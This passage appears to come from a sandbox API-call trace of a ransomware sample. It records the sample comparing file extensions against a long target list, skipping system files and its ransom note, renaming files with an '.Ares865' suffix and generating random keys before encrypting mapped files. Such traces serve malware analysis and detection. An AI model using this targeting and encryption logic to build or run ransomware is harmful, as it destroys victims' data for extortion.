(lpString="fol") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.535] lstrlenW (lpString="fp3") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.535] lstrlenW (lpString="fp4") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.535] lstrlenW (lpString="fp5") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.535] lstrlenW (lpString="fp7") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.535] lstrlenW (lpString="fpt") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.535] lstrlenW (lpString="frm") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.535] lstrlenW (lpString="gdb") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.535] lstrlenW (lpString="gdb") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.535] lstrlenW (lpString="grdb") returned 4 [0063.535] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.535] lstrlenW (lpString="gwi") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.535] lstrlenW (lpString="hdb") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.535] lstrlenW (lpString="his") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.535] lstrlenW (lpString="ib") returned 2 [0063.535] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.535] lstrlenW (lpString="idb") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.535] lstrlenW (lpString="ihx") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.535] lstrlenW (lpString="itdb") returned 4 [0063.535] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.535] lstrlenW (lpString="itw") returned 3 [0063.535] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.536] lstrlenW (lpString="jet") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.536] lstrlenW (lpString="jtx") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.536] lstrlenW (lpString="kdb") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.536] lstrlenW (lpString="kexi") returned 4 [0063.536] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.536] lstrlenW (lpString="kexic") returned 5 [0063.536] lstrcmpiW (lpString1="s.htm", lpString2="kexic") returned 1 [0063.536] lstrlenW (lpString="kexis") returned 5 [0063.536] lstrcmpiW (lpString1="s.htm", lpString2="kexis") returned 1 [0063.536] lstrlenW (lpString="lgc") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.536] lstrlenW (lpString="lwx") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.536] lstrlenW (lpString="maf") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.536] lstrlenW (lpString="maq") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.536] lstrlenW (lpString="mar") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.536] lstrlenW (lpString="marshal") returned 7 [0063.536] lstrcmpiW (lpString1="les.htm", lpString2="marshal") returned -1 [0063.536] lstrlenW (lpString="mas") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.536] lstrlenW (lpString="mav") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.536] lstrlenW (lpString="maw") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.536] lstrlenW (lpString="mdbhtml") returned 7 [0063.536] lstrcmpiW (lpString1="les.htm", lpString2="mdbhtml") returned -1 [0063.536] lstrlenW (lpString="mdn") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.536] lstrlenW (lpString="mdt") returned 3 [0063.536] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.536] lstrlenW (lpString="mfd") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.537] lstrlenW (lpString="mpd") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.537] lstrlenW (lpString="mrg") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.537] lstrlenW (lpString="mud") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.537] lstrlenW (lpString="mwb") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.537] lstrlenW (lpString="myd") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.537] lstrlenW (lpString="ndf") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.537] lstrlenW (lpString="nnt") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.537] lstrlenW (lpString="nrmlib") returned 6 [0063.537] lstrcmpiW (lpString1="es.htm", lpString2="nrmlib") returned -1 [0063.537] lstrlenW (lpString="ns2") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.537] lstrlenW (lpString="ns3") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.537] lstrlenW (lpString="ns4") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.537] lstrlenW (lpString="nsf") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.537] lstrlenW (lpString="nv") returned 2 [0063.537] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.537] lstrlenW (lpString="nv2") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.537] lstrlenW (lpString="nwdb") returned 4 [0063.537] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.537] lstrlenW (lpString="nyf") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.537] lstrlenW (lpString="odb") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.537] lstrlenW (lpString="odb") returned 3 [0063.537] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.538] lstrlenW (lpString="oqy") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.538] lstrlenW (lpString="ora") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.538] lstrlenW (lpString="orx") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.538] lstrlenW (lpString="owc") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.538] lstrlenW (lpString="p96") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.538] lstrlenW (lpString="p97") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.538] lstrlenW (lpString="pan") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.538] lstrlenW (lpString="pdb") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.538] lstrlenW (lpString="pdm") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.538] lstrlenW (lpString="pnz") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.538] lstrlenW (lpString="qry") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.538] lstrlenW (lpString="qvd") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.538] lstrlenW (lpString="rbf") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.538] lstrlenW (lpString="rctd") returned 4 [0063.538] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.538] lstrlenW (lpString="rod") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.538] lstrlenW (lpString="rodx") returned 4 [0063.538] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.538] lstrlenW (lpString="rpd") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.538] lstrlenW (lpString="rsd") returned 3 [0063.538] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.538] lstrlenW (lpString="sas7bdat") returned 8 [0063.539] lstrcmpiW (lpString1="cles.htm", lpString2="sas7bdat") returned -1 [0063.539] lstrlenW (lpString="sbf") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.539] lstrlenW (lpString="scx") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.539] lstrlenW (lpString="sdb") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.539] lstrlenW (lpString="sdc") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.539] lstrlenW (lpString="sdf") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.539] lstrlenW (lpString="sis") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.539] lstrlenW (lpString="spq") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.539] lstrlenW (lpString="te") returned 2 [0063.539] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.539] lstrlenW (lpString="teacher") returned 7 [0063.539] lstrcmpiW (lpString1="les.htm", lpString2="teacher") returned -1 [0063.539] lstrlenW (lpString="tmd") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.539] lstrlenW (lpString="tps") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.539] lstrlenW (lpString="trc") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.539] lstrlenW (lpString="trc") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.539] lstrlenW (lpString="trm") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.539] lstrlenW (lpString="udb") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.539] lstrlenW (lpString="udl") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.539] lstrlenW (lpString="usr") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.539] lstrlenW (lpString="v12") returned 3 [0063.539] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.539] lstrlenW (lpString="vis") returned 3 [0063.540] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.540] lstrlenW (lpString="vpd") returned 3 [0063.540] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.540] lstrlenW (lpString="vvv") returned 3 [0063.540] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.540] lstrlenW (lpString="wdb") returned 3 [0063.540] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.540] lstrlenW (lpString="wmdb") returned 4 [0063.540] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.540] lstrlenW (lpString="wrk") returned 3 [0063.540] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.540] lstrlenW (lpString="xdb") returned 3 [0063.540] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.540] lstrlenW (lpString="xld") returned 3 [0063.540] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.540] lstrlenW (lpString="xmlff") returned 5 [0063.540] lstrcmpiW (lpString1="s.htm", lpString2="xmlff") returned -1 [0063.540] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.Ares865") returned 97 [0063.540] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\orange circles.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\orange circles.htm.ares865"), dwFlags=0x1) returned 1 [0063.541] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\orange circles.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.541] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0063.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.541] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.542] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.542] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.542] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.545] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.546] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.546] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.546] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.546] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.547] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.547] CloseHandle (hObject=0x164) returned 1 [0063.547] CloseHandle (hObject=0x154) returned 1 [0063.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.547] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.547] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x649d3c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x649d3c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa4cf00d, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OrangeCircles.jpg", cAlternateFileName="ORANGE~1.JPG")) returned 1 [0063.547] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0063.547] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="aoldtz.exe") returned 1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".") returned 1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="..") returned 1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="windows") returned -1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="bootmgr") returned 1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="temp") returned -1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="pagefile.sys") returned -1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="boot") returned 1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="ids.txt") returned 1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="ntuser.dat") returned 1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="perflogs") returned -1 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="MSBuild") returned 1 [0063.548] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0063.548] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 89 [0063.548] lstrcpyW (in: lpString1=0x2cce48e, lpString2="OrangeCircles.jpg" | out: lpString1="OrangeCircles.jpg") returned="OrangeCircles.jpg" [0063.548] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0063.548] lstrlenW (lpString="Ares865") returned 7 [0063.548] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0063.548] lstrlenW (lpString=".dll") returned 4 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".dll") returned 1 [0063.548] lstrlenW (lpString=".lnk") returned 4 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".lnk") returned 1 [0063.548] lstrlenW (lpString=".ini") returned 4 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".ini") returned 1 [0063.548] lstrlenW (lpString=".sys") returned 4 [0063.548] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2=".sys") returned 1 [0063.548] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0063.548] lstrlenW (lpString="bak") returned 3 [0063.548] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.548] lstrlenW (lpString="ba_") returned 3 [0063.548] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.548] lstrlenW (lpString="dbb") returned 3 [0063.548] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.548] lstrlenW (lpString="vmdk") returned 4 [0063.548] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.548] lstrlenW (lpString="rar") returned 3 [0063.548] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.548] lstrlenW (lpString="zip") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.549] lstrlenW (lpString="tgz") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.549] lstrlenW (lpString="vbox") returned 4 [0063.549] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.549] lstrlenW (lpString="vdi") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.549] lstrlenW (lpString="vhd") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.549] lstrlenW (lpString="vhdx") returned 4 [0063.549] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.549] lstrlenW (lpString="avhd") returned 4 [0063.549] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.549] lstrlenW (lpString="db") returned 2 [0063.549] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.549] lstrlenW (lpString="db2") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.549] lstrlenW (lpString="db3") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.549] lstrlenW (lpString="dbf") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.549] lstrlenW (lpString="mdf") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.549] lstrlenW (lpString="mdb") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.549] lstrlenW (lpString="sql") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.549] lstrlenW (lpString="sqlite") returned 6 [0063.549] lstrcmpiW (lpString1="es.jpg", lpString2="sqlite") returned -1 [0063.549] lstrlenW (lpString="sqlite3") returned 7 [0063.549] lstrcmpiW (lpString1="les.jpg", lpString2="sqlite3") returned -1 [0063.549] lstrlenW (lpString="sqlitedb") returned 8 [0063.549] lstrcmpiW (lpString1="cles.jpg", lpString2="sqlitedb") returned -1 [0063.549] lstrlenW (lpString="xml") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.549] lstrlenW (lpString="$er") returned 3 [0063.549] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.550] lstrlenW (lpString="4dd") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.550] lstrlenW (lpString="4dl") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.550] lstrlenW (lpString="^^^") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.550] lstrlenW (lpString="abs") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.550] lstrlenW (lpString="abx") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.550] lstrlenW (lpString="accdb") returned 5 [0063.550] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0063.550] lstrlenW (lpString="accdc") returned 5 [0063.550] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0063.550] lstrlenW (lpString="accde") returned 5 [0063.550] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0063.550] lstrlenW (lpString="accdr") returned 5 [0063.550] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0063.550] lstrlenW (lpString="accdt") returned 5 [0063.550] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0063.550] lstrlenW (lpString="accdw") returned 5 [0063.550] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0063.550] lstrlenW (lpString="accft") returned 5 [0063.550] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0063.550] lstrlenW (lpString="adb") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.550] lstrlenW (lpString="adb") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.550] lstrlenW (lpString="ade") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.550] lstrlenW (lpString="adf") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.550] lstrlenW (lpString="adn") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.550] lstrlenW (lpString="adp") returned 3 [0063.550] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.551] lstrlenW (lpString="alf") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.551] lstrlenW (lpString="ask") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.551] lstrlenW (lpString="btr") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.551] lstrlenW (lpString="cat") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.551] lstrlenW (lpString="cdb") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.551] lstrlenW (lpString="ckp") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.551] lstrlenW (lpString="cma") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.551] lstrlenW (lpString="cpd") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.551] lstrlenW (lpString="dacpac") returned 6 [0063.551] lstrcmpiW (lpString1="es.jpg", lpString2="dacpac") returned 1 [0063.551] lstrlenW (lpString="dad") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.551] lstrlenW (lpString="dadiagrams") returned 10 [0063.551] lstrcmpiW (lpString1="ircles.jpg", lpString2="dadiagrams") returned 1 [0063.551] lstrlenW (lpString="daschema") returned 8 [0063.551] lstrcmpiW (lpString1="cles.jpg", lpString2="daschema") returned -1 [0063.551] lstrlenW (lpString="db-journal") returned 10 [0063.551] lstrcmpiW (lpString1="ircles.jpg", lpString2="db-journal") returned 1 [0063.551] lstrlenW (lpString="db-shm") returned 6 [0063.551] lstrcmpiW (lpString1="es.jpg", lpString2="db-shm") returned 1 [0063.551] lstrlenW (lpString="db-wal") returned 6 [0063.551] lstrcmpiW (lpString1="es.jpg", lpString2="db-wal") returned 1 [0063.551] lstrlenW (lpString="dbc") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.551] lstrlenW (lpString="dbs") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.551] lstrlenW (lpString="dbt") returned 3 [0063.551] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.551] lstrlenW (lpString="dbv") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.552] lstrlenW (lpString="dbx") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.552] lstrlenW (lpString="dcb") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.552] lstrlenW (lpString="dct") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.552] lstrlenW (lpString="dcx") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.552] lstrlenW (lpString="ddl") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.552] lstrlenW (lpString="dlis") returned 4 [0063.552] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.552] lstrlenW (lpString="dp1") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.552] lstrlenW (lpString="dqy") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.552] lstrlenW (lpString="dsk") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.552] lstrlenW (lpString="dsn") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.552] lstrlenW (lpString="dtsx") returned 4 [0063.552] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.552] lstrlenW (lpString="dxl") returned 3 [0063.552] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.552] lstrlenW (lpString="eco") returned 3 [0063.552] lstrcmpiW 